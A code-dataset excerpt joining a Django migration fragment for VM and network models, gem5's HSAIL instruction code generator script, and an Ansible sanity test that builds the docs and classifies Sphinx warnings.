'reservations': ('django.db.models.fields.TextField', [], {'default': "''"}),
'state': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '32'}),
'subnet': ('django.db.models.fields.CharField', [], {'default': "'10.0.0.0/24'", 'max_length': '32'}),
'subnet6': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'PRIVATE_PHYSICAL_VLAN'", 'max_length': '50'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'db.networkinterface': {
'Meta': {'object_name': 'NetworkInterface'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'firewall_profile': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {}),
'ipv4': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'}),
'ipv6': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'machine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.VirtualMachine']"}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.Network']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'db.virtualmachine': {
'Meta': {'object_name': 'VirtualMachine'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'virtual_machines'", 'null': 'True', 'to': "orm['db.Backend']"}),
'backend_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'buildpercentage': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'flavor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['db.Flavor']"}),
'hostid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'operstate': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'suspended': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'db.virtualmachinemetadata': {
'Meta': {'unique_together': "(('meta_key', 'vm'),)", 'object_name': 'VirtualMachineMetadata'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_key': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'meta_value': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'vm': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'metadata'", 'to': "orm['db.VirtualMachine']"})
}
}
complete_apps = ['db']
|
gpl-3.0
|
Weil0ng/gem5
|
src/arch/hsail/gen.py
|
10
|
27196
|
#! /usr/bin/python
#
# Copyright (c) 2015 Advanced Micro Devices, Inc.
# All rights reserved.
#
# For use for simulation and test purposes only
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Steve Reinhardt
#
import sys, re
from m5.util import code_formatter
if len(sys.argv) != 4:
print "Error: need 3 args (file names)"
sys.exit(0)
header_code = code_formatter()
decoder_code = code_formatter()
exec_code = code_formatter()
###############
#
# Generate file prologs (includes etc.)
#
###############
header_code('''
#include "arch/hsail/insts/decl.hh"
#include "base/bitfield.hh"
#include "gpu-compute/hsail_code.hh"
#include "gpu-compute/wavefront.hh"
namespace HsailISA
{
''')
header_code.indent()
decoder_code('''
#include "arch/hsail/gpu_decoder.hh"
#include "arch/hsail/insts/branch.hh"
#include "arch/hsail/insts/decl.hh"
#include "arch/hsail/insts/gen_decl.hh"
#include "arch/hsail/insts/mem.hh"
#include "arch/hsail/insts/mem_impl.hh"
#include "gpu-compute/brig_object.hh"
namespace HsailISA
{
std::vector<GPUStaticInst*> Decoder::decodedInsts;
GPUStaticInst*
Decoder::decode(MachInst machInst)
{
using namespace Brig;
const BrigInstBase *ib = machInst.brigInstBase;
const BrigObject *obj = machInst.brigObj;
switch(ib->opcode) {
''')
decoder_code.indent()
decoder_code.indent()
exec_code('''
#include "arch/hsail/insts/gen_decl.hh"
#include "base/intmath.hh"
namespace HsailISA
{
''')
exec_code.indent()
###############
#
# Define code templates for class declarations (for header file)
#
###############
# Basic header template for an instruction stub.
header_template_stub = '''
class $class_name : public $base_class
{
public:
typedef $base_class Base;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
# Basic header template for an instruction with no template parameters.
header_template_nodt = '''
class $class_name : public $base_class
{
public:
typedef $base_class Base;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
# Basic header template for an instruction with a single DataType
# template parameter.
header_template_1dt = '''
template<typename DataType>
class $class_name : public $base_class<DataType>
{
public:
typedef $base_class<DataType> Base;
typedef typename DataType::CType CType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
header_template_1dt_noexec = '''
template<typename DataType>
class $class_name : public $base_class<DataType>
{
public:
typedef $base_class<DataType> Base;
typedef typename DataType::CType CType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
};
'''
# Same as header_template_1dt, except the base class has a second
# template parameter NumSrcOperands to allow a variable number of
# source operands. Note that since this is implemented with an array,
# it only works for instructions where all sources are of the same
# type (like most arithmetics).
header_template_1dt_varsrcs = '''
template<typename DataType>
class $class_name : public $base_class<DataType, $num_srcs>
{
public:
typedef $base_class<DataType, $num_srcs> Base;
typedef typename DataType::CType CType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
# Header template for instruction with two DataType template
# parameters, one for the dest and one for the source. This is used
# by compare and convert.
header_template_2dt = '''
template<typename DestDataType, class SrcDataType>
class $class_name : public $base_class<DestDataType, SrcDataType>
{
public:
typedef $base_class<DestDataType, SrcDataType> Base;
typedef typename DestDataType::CType DestCType;
typedef typename SrcDataType::CType SrcCType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
header_templates = {
'ArithInst': header_template_1dt_varsrcs,
'CmovInst': header_template_1dt,
'ClassInst': header_template_1dt,
'ShiftInst': header_template_1dt,
'ExtractInsertInst': header_template_1dt,
'CmpInst': header_template_2dt,
'CvtInst': header_template_2dt,
'PopcountInst': header_template_2dt,
'LdInst': '',
'StInst': '',
'SpecialInstNoSrc': header_template_nodt,
'SpecialInst1Src': header_template_nodt,
'SpecialInstNoSrcNoDest': '',
'Stub': header_template_stub,
}
###############
#
# Define code templates for exec functions
#
###############
# exec function body
exec_template_stub = '''
void
$class_name::execute(GPUDynInstPtr gpuDynInst)
{
fatal("instruction unimplemented %s\\n", gpuDynInst->disassemble());
}
'''
exec_template_nodt_nosrc = '''
void
$class_name::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef Base::DestCType DestCType;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
DestCType dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_nodt_1src = '''
void
$class_name::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef Base::DestCType DestCType;
typedef Base::SrcCType SrcCType;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
SrcCType src_val0 = this->src0.get<SrcCType>(w, lane);
DestCType dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_1dt_varsrcs = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<CType>(w, lane);
}
CType src_val[$num_srcs];
for (int i = 0; i < $num_srcs; ++i) {
src_val[i] = this->src[i].template get<CType>(w, lane);
}
dest_val = (CType)($expr);
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_1dt_3srcs = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef typename Base::Src0CType Src0T;
typedef typename Base::Src1CType Src1T;
typedef typename Base::Src2CType Src2T;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<CType>(w, lane);
}
Src0T src_val0 = this->src0.template get<Src0T>(w, lane);
Src1T src_val1 = this->src1.template get<Src1T>(w, lane);
Src2T src_val2 = this->src2.template get<Src2T>(w, lane);
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_1dt_2src_1dest = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef typename Base::DestCType DestT;
typedef CType Src0T;
typedef typename Base::Src1CType Src1T;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
DestT dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<DestT>(w, lane);
}
Src0T src_val0 = this->src0.template get<Src0T>(w, lane);
Src1T src_val1 = this->src1.template get<Src1T>(w, lane);
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_shift = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<CType>(w, lane);
}
CType src_val0 = this->src0.template get<CType>(w, lane);
uint32_t src_val1 = this->src1.template get<uint32_t>(w, lane);
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_2dt = '''
template<typename DestDataType, class SrcDataType>
void
$class_name<DestDataType, SrcDataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
DestCType dest_val;
SrcCType src_val[$num_srcs];
for (int i = 0; i < $num_srcs; ++i) {
src_val[i] = this->src[i].template get<SrcCType>(w, lane);
}
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_templates = {
'ArithInst': exec_template_1dt_varsrcs,
'CmovInst': exec_template_1dt_3srcs,
'ExtractInsertInst': exec_template_1dt_3srcs,
'ClassInst': exec_template_1dt_2src_1dest,
'CmpInst': exec_template_2dt,
'CvtInst': exec_template_2dt,
'PopcountInst': exec_template_2dt,
'LdInst': '',
'StInst': '',
'SpecialInstNoSrc': exec_template_nodt_nosrc,
'SpecialInst1Src': exec_template_nodt_1src,
'SpecialInstNoSrcNoDest': '',
'Stub': exec_template_stub,
}
###############
#
# Define code templates for the decoder cases
#
###############
# decode template for nodt-opcode case
decode_nodt_template = '''
case BRIG_OPCODE_$brig_opcode_upper: return $constructor(ib, obj);'''
decode_case_prolog_class_inst = '''
case BRIG_OPCODE_$brig_opcode_upper:
{
//const BrigOperandBase *baseOp = obj->getOperand(ib->operands[1]);
BrigType16_t type = ((BrigInstSourceType*)ib)->sourceType;
//switch (baseOp->kind) {
// case BRIG_OPERAND_REG:
// type = ((const BrigOperandReg*)baseOp)->type;
// break;
// case BRIG_OPERAND_IMMED:
// type = ((const BrigOperandImmed*)baseOp)->type;
// break;
// default:
// fatal("CLASS unrecognized kind of operand %d\\n",
// baseOp->kind);
//}
switch (type) {'''
# common prolog for 1dt- or 2dt-opcode case: switch on data type
decode_case_prolog = '''
case BRIG_OPCODE_$brig_opcode_upper:
{
switch (ib->type) {'''
# single-level decode case entry (for 1dt opcodes)
decode_case_entry = \
' case BRIG_TYPE_$type_name: return $constructor(ib, obj);'
decode_store_prolog = \
' case BRIG_TYPE_$type_name: {'
decode_store_case_epilog = '''
}'''
decode_store_case_entry = \
' return $constructor(ib, obj);'
# common epilog for type switch
decode_case_epilog = '''
default: fatal("$brig_opcode_upper: unrecognized type %d\\n",
ib->type);
}
}
break;'''
# Additional templates for nested decode on a second type field (for
# compare and convert). These are used in place of the
# decode_case_entry template to create a second-level switch on on the
# second type field inside each case of the first-level type switch.
# Because the name and location of the second type can vary, the Brig
# instruction type must be provided in $brig_type, and the name of the
# second type field must be provided in $type_field.
decode_case2_prolog = '''
case BRIG_TYPE_$type_name:
switch (((Brig$brig_type*)ib)->$type2_field) {'''
decode_case2_entry = \
' case BRIG_TYPE_$type2_name: return $constructor(ib, obj);'
decode_case2_epilog = '''
default: fatal("$brig_opcode_upper: unrecognized $type2_field %d\\n",
((Brig$brig_type*)ib)->$type2_field);
}
break;'''
# Figure out how many source operands an expr needs by looking for the
# highest-numbered srcN value referenced. Since sources are numbered
# starting at 0, the return value is N+1.
def num_src_operands(expr):
if expr.find('src2') != -1:
return 3
elif expr.find('src1') != -1:
return 2
elif expr.find('src0') != -1:
return 1
else:
return 0
###############
#
# Define final code generation methods
#
# The gen_nodt, and gen_1dt, and gen_2dt methods are the interface for
# generating actual instructions.
#
###############
# Generate class declaration, exec function, and decode switch case
# for an brig_opcode with a single-level type switch. The 'types'
# parameter is a list or tuple of types for which the instruction
# should be instantiated.
def gen(brig_opcode, types=None, expr=None, base_class='ArithInst',
type2_info=None, constructor_prefix='new ', is_store=False):
brig_opcode_upper = brig_opcode.upper()
class_name = brig_opcode
opcode = class_name.lower()
if base_class == 'ArithInst':
# note that expr must be provided with ArithInst so we can
# derive num_srcs for the template
assert expr
if expr:
# Derive several bits of info from expr. If expr is not used,
# this info will be irrelevant.
num_srcs = num_src_operands(expr)
# if the RHS expression includes 'dest', then we're doing an RMW
# on the reg and we need to treat it like a source
dest_is_src = expr.find('dest') != -1
dest_is_src_flag = str(dest_is_src).lower() # for C++
if base_class in ['ShiftInst']:
expr = re.sub(r'\bsrc(\d)\b', r'src_val\1', expr)
elif base_class in ['ArithInst', 'CmpInst', 'CvtInst', 'PopcountInst']:
expr = re.sub(r'\bsrc(\d)\b', r'src_val[\1]', expr)
else:
expr = re.sub(r'\bsrc(\d)\b', r'src_val\1', expr)
expr = re.sub(r'\bdest\b', r'dest_val', expr)
# Strip template arguments off of base class before looking up
# appropriate templates
base_class_base = re.sub(r'<.*>$', '', base_class)
header_code(header_templates[base_class_base])
if base_class.startswith('SpecialInst') or base_class.startswith('Stub'):
exec_code(exec_templates[base_class_base])
elif base_class.startswith('ShiftInst'):
header_code(exec_template_shift)
else:
header_code(exec_templates[base_class_base])
if not types or isinstance(types, str):
# Just a single type
constructor = constructor_prefix + class_name
decoder_code(decode_nodt_template)
else:
# multiple types, need at least one level of decode
if brig_opcode == 'Class':
decoder_code(decode_case_prolog_class_inst)
else:
decoder_code(decode_case_prolog)
if not type2_info:
if not is_store:
# single list of types, to basic one-level decode
for type_name in types:
full_class_name = '%s<%s>' % (class_name, type_name.upper())
constructor = constructor_prefix + full_class_name
decoder_code(decode_case_entry)
else:
# single list of types, to basic one-level decode
for type_name in types:
decoder_code(decode_store_prolog)
type_size = int(re.findall(r'[0-9]+', type_name)[0])
src_size = 32
type_type = type_name[0]
full_class_name = '%s<%s,%s>' % (class_name, \
type_name.upper(), \
'%s%d' % \
(type_type.upper(), \
type_size))
constructor = constructor_prefix + full_class_name
decoder_code(decode_store_case_entry)
decoder_code(decode_store_case_epilog)
else:
# need secondary type switch (convert, compare)
# unpack extra info on second switch
(type2_field, types2) = type2_info
brig_type = 'Inst%s' % brig_opcode
for type_name in types:
decoder_code(decode_case2_prolog)
fmt = '%s<%s,%%s>' % (class_name, type_name.upper())
for type2_name in types2:
full_class_name = fmt % type2_name.upper()
constructor = constructor_prefix + full_class_name
decoder_code(decode_case2_entry)
decoder_code(decode_case2_epilog)
decoder_code(decode_case_epilog)
###############
#
# Generate instructions
#
###############
# handy abbreviations for common sets of types
# arithmetic ops are typically defined only on 32- and 64-bit sizes
arith_int_types = ('S32', 'U32', 'S64', 'U64')
arith_float_types = ('F32', 'F64')
arith_types = arith_int_types + arith_float_types
bit_types = ('B1', 'B32', 'B64')
all_int_types = ('S8', 'U8', 'S16', 'U16') + arith_int_types
# I think you might be able to do 'f16' memory ops too, but we'll
# ignore them for now.
mem_types = all_int_types + arith_float_types
mem_atom_types = all_int_types + ('B32', 'B64')
##### Arithmetic & logical operations
gen('Add', arith_types, 'src0 + src1')
gen('Sub', arith_types, 'src0 - src1')
gen('Mul', arith_types, 'src0 * src1')
gen('Div', arith_types, 'src0 / src1')
gen('Min', arith_types, 'std::min(src0, src1)')
gen('Max', arith_types, 'std::max(src0, src1)')
gen('Gcnmin', arith_types, 'std::min(src0, src1)')
gen('CopySign', arith_float_types,
'src1 < 0 ? -std::abs(src0) : std::abs(src0)')
gen('Sqrt', arith_float_types, 'sqrt(src0)')
gen('Floor', arith_float_types, 'floor(src0)')
# "fast" sqrt... same as slow for us
gen('Nsqrt', arith_float_types, 'sqrt(src0)')
gen('Nrsqrt', arith_float_types, '1.0/sqrt(src0)')
gen('Nrcp', arith_float_types, '1.0/src0')
gen('Fract', arith_float_types,
'(src0 >= 0.0)?(src0-floor(src0)):(floor(src0)-src0)')
gen('Ncos', arith_float_types, 'cos(src0)');
gen('Nsin', arith_float_types, 'sin(src0)');
gen('And', bit_types, 'src0 & src1')
gen('Or', bit_types, 'src0 | src1')
gen('Xor', bit_types, 'src0 ^ src1')
gen('Bitselect', bit_types, '(src1 & src0) | (src2 & ~src0)')
gen('Popcount', ('U32',), '__builtin_popcount(src0)', 'PopcountInst', \
('sourceType', ('B32', 'B64')))
gen('Shl', arith_int_types, 'src0 << (unsigned)src1', 'ShiftInst')
gen('Shr', arith_int_types, 'src0 >> (unsigned)src1', 'ShiftInst')
# gen('Mul_hi', types=('s32','u32', '??'))
# gen('Mul24', types=('s32','u32', '??'))
gen('Rem', arith_int_types, 'src0 - ((src0 / src1) * src1)')
gen('Abs', arith_types, 'std::abs(src0)')
gen('Neg', arith_types, '-src0')
gen('Mov', bit_types + arith_types, 'src0')
gen('Not', bit_types, 'heynot(src0)')
# mad and fma differ only in rounding behavior, which we don't emulate
# also there's an integer form of mad, but not of fma
gen('Mad', arith_types, 'src0 * src1 + src2')
gen('Fma', arith_float_types, 'src0 * src1 + src2')
#native floating point operations
gen('Nfma', arith_float_types, 'src0 * src1 + src2')
gen('Cmov', bit_types, 'src0 ? src1 : src2', 'CmovInst')
gen('BitAlign', bit_types, '(src0 << src2)|(src1 >> (32 - src2))')
gen('ByteAlign', bit_types, '(src0 << 8 * src2)|(src1 >> (32 - 8 * src2))')
# see base/bitfield.hh
gen('BitExtract', arith_int_types, 'bits(src0, src1, src1 + src2 - 1)',
'ExtractInsertInst')
gen('BitInsert', arith_int_types, 'insertBits(dest, src1, src2, src0)',
'ExtractInsertInst')
##### Compare
gen('Cmp', ('B1', 'S32', 'U32', 'F32'), 'compare(src0, src1, this->cmpOp)',
'CmpInst', ('sourceType', arith_types + bit_types))
gen('Class', arith_float_types, 'fpclassify(src0,src1)','ClassInst')
##### Conversion
# Conversion operations are only defined on B1, not B32 or B64
cvt_types = ('B1',) + mem_types
gen('Cvt', cvt_types, 'src0', 'CvtInst', ('sourceType', cvt_types))
##### Load & Store
gen('Lda', mem_types, base_class = 'LdInst', constructor_prefix='decode')
gen('Ld', mem_types, base_class = 'LdInst', constructor_prefix='decode')
gen('St', mem_types, base_class = 'StInst', constructor_prefix='decode',
is_store=True)
gen('Atomic', mem_atom_types, base_class='StInst', constructor_prefix='decode')
gen('AtomicNoRet', mem_atom_types, base_class='StInst',
constructor_prefix='decode')
gen('Cbr', base_class = 'LdInst', constructor_prefix='decode')
gen('Br', base_class = 'LdInst', constructor_prefix='decode')
##### Special operations
def gen_special(brig_opcode, expr, dest_type='U32'):
num_srcs = num_src_operands(expr)
if num_srcs == 0:
base_class = 'SpecialInstNoSrc<%s>' % dest_type
elif num_srcs == 1:
base_class = 'SpecialInst1Src<%s>' % dest_type
else:
assert false
gen(brig_opcode, None, expr, base_class)
gen_special('WorkItemId', 'w->workItemId[src0][lane]')
gen_special('WorkItemAbsId',
'w->workItemId[src0][lane] + (w->workGroupId[src0] * w->workGroupSz[src0])')
gen_special('WorkGroupId', 'w->workGroupId[src0]')
gen_special('WorkGroupSize', 'w->workGroupSz[src0]')
gen_special('CurrentWorkGroupSize', 'w->workGroupSz[src0]')
gen_special('GridSize', 'w->gridSz[src0]')
gen_special('GridGroups',
'divCeil(w->gridSz[src0],w->workGroupSz[src0])')
gen_special('LaneId', 'lane')
gen_special('WaveId', 'w->wfId')
gen_special('Clock', 'w->computeUnit->shader->tick_cnt', 'U64')
# gen_special('CU'', ')
gen('Ret', base_class='SpecialInstNoSrcNoDest')
gen('Barrier', base_class='SpecialInstNoSrcNoDest')
gen('MemFence', base_class='SpecialInstNoSrcNoDest')
# Map magic instructions to the BrigSyscall opcode
# Magic instructions are defined in magic.hh
#
# In the future, real HSA kernel system calls can be implemented and coexist
# with magic instructions.
gen('Call', base_class='SpecialInstNoSrcNoDest')
# Stubs for unimplemented instructions:
# These may need to be implemented at some point in the future, but
# for now we just match the instructions with their operands.
#
# By defining stubs for these instructions, we can work with
# applications that have them in dead/unused code paths.
#
# Needed for rocm-hcc compilations for HSA backends since
# builtins-hsail library is `cat`d onto the generated kernels.
# The builtins-hsail library consists of handcoded hsail functions
# that __might__ be needed by the rocm-hcc compiler in certain binaries.
gen('Bitmask', base_class='Stub')
gen('Bitrev', base_class='Stub')
gen('Firstbit', base_class='Stub')
gen('Lastbit', base_class='Stub')
gen('Unpacklo', base_class='Stub')
gen('Unpackhi', base_class='Stub')
gen('Pack', base_class='Stub')
gen('Unpack', base_class='Stub')
gen('Lerp', base_class='Stub')
gen('Packcvt', base_class='Stub')
gen('Unpackcvt', base_class='Stub')
gen('Sad', base_class='Stub')
gen('Sadhi', base_class='Stub')
gen('Activelanecount', base_class='Stub')
gen('Activelaneid', base_class='Stub')
gen('Activelanemask', base_class='Stub')
gen('Activelanepermute', base_class='Stub')
gen('Groupbaseptr', base_class='Stub')
gen('Signalnoret', base_class='Stub')
###############
#
# Generate file epilogs
#
###############
header_code('''
template<>
inline void
Abs<U32>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
CType src_val;
src_val = this->src[0].template get<CType>(w, lane);
dest_val = (CType)(src_val);
this->dest.set(w, lane, dest_val);
}
}
}
template<>
inline void
Abs<U64>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
CType src_val;
src_val = this->src[0].template get<CType>(w, lane);
dest_val = (CType)(src_val);
this->dest.set(w, lane, dest_val);
}
}
}
''')
header_code.dedent()
header_code('''
} // namespace HsailISA
''')
# close off main decode switch
decoder_code.dedent()
decoder_code.dedent()
decoder_code('''
default: fatal("unrecognized Brig opcode %d\\n", ib->opcode);
} // end switch(ib->opcode)
} // end decode()
} // namespace HsailISA
''')
exec_code.dedent()
exec_code('''
} // namespace HsailISA
''')
###############
#
# Output accumulated code to files
#
###############
header_code.write(sys.argv[1])
decoder_code.write(sys.argv[2])
exec_code.write(sys.argv[3])
|
bsd-3-clause
|
KohlsTechnology/ansible
|
test/sanity/code-smell/docs-build.py
|
17
|
3775
|
#!/usr/bin/env python
import os
import re
import subprocess
def main():
base_dir = os.getcwd() + os.sep
docs_dir = os.path.abspath('docs/docsite')
cmd = ['make', 'singlehtmldocs']
sphinx = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=docs_dir)
stdout, stderr = sphinx.communicate()
if sphinx.returncode != 0:
raise subprocess.CalledProcessError(sphinx.returncode, cmd, output=stdout, stderr=stderr)
with open('docs/docsite/rst_warnings', 'r') as warnings_fd:
output = warnings_fd.read().strip()
lines = output.splitlines()
known_warnings = {
'block-quote-missing-blank-line': r'^Block quote ends without a blank line; unexpected unindent.$',
'literal-block-lex-error': r'^Could not lex literal_block as "[^"]*". Highlighting skipped.$',
'duplicate-label': r'^duplicate label ',
'undefined-label': r'undefined label: ',
'unknown-document': r'unknown document: ',
'toc-tree-missing-document': r'toctree contains reference to nonexisting document ',
'reference-target-not-found': r'[^ ]* reference target not found: ',
'not-in-toc-tree': r"document isn't included in any toctree$",
'unexpected-indentation': r'^Unexpected indentation.$',
'definition-list-missing-blank-line': r'^Definition list ends without a blank line; unexpected unindent.$',
'explicit-markup-missing-blank-line': r'Explicit markup ends without a blank line; unexpected unindent.$',
'toc-tree-glob-pattern-no-match': r"^toctree glob pattern '[^']*' didn't match any documents$",
'unknown-interpreted-text-role': '^Unknown interpreted text role "[^"]*".$',
}
ignore_codes = [
'literal-block-lex-error',
'reference-target-not-found',
'not-in-toc-tree',
]
used_ignore_codes = set()
for line in lines:
match = re.search('^(?P<path>[^:]+):((?P<line>[0-9]+):)?((?P<column>[0-9]+):)? (?P<level>WARNING|ERROR): (?P<message>.*)$', line)
if not match:
path = 'docs/docsite/rst/index.rst'
lineno = 0
column = 0
code = 'unknown'
message = line
# surface unknown lines while filtering out known lines to avoid excessive output
print('%s:%d:%d: %s: %s' % (path, lineno, column, code, message))
continue
path = match.group('path')
lineno = int(match.group('line') or 0)
column = int(match.group('column') or 0)
level = match.group('level').lower()
message = match.group('message')
path = os.path.abspath(path)
if path.startswith(base_dir):
path = path[len(base_dir):]
if path.startswith('rst/'):
path = 'docs/docsite/' + path # fix up paths reported relative to `docs/docsite/`
if level == 'warning':
code = 'warning'
for label, pattern in known_warnings.items():
if re.search(pattern, message):
code = label
break
else:
code = 'error'
if code == 'not-in-toc-tree' and path.startswith('docs/docsite/rst/modules/'):
continue # modules are not expected to be in the toc tree
if code in ignore_codes:
used_ignore_codes.add(code)
continue # ignore these codes
print('%s:%d:%d: %s: %s' % (path, lineno, column, code, message))
unused_ignore_codes = set(ignore_codes) - used_ignore_codes
for code in unused_ignore_codes:
print('test/sanity/code-smell/docs-build.py:0:0: remove `%s` from the `ignore_codes` list as it is no longer needed' % code)
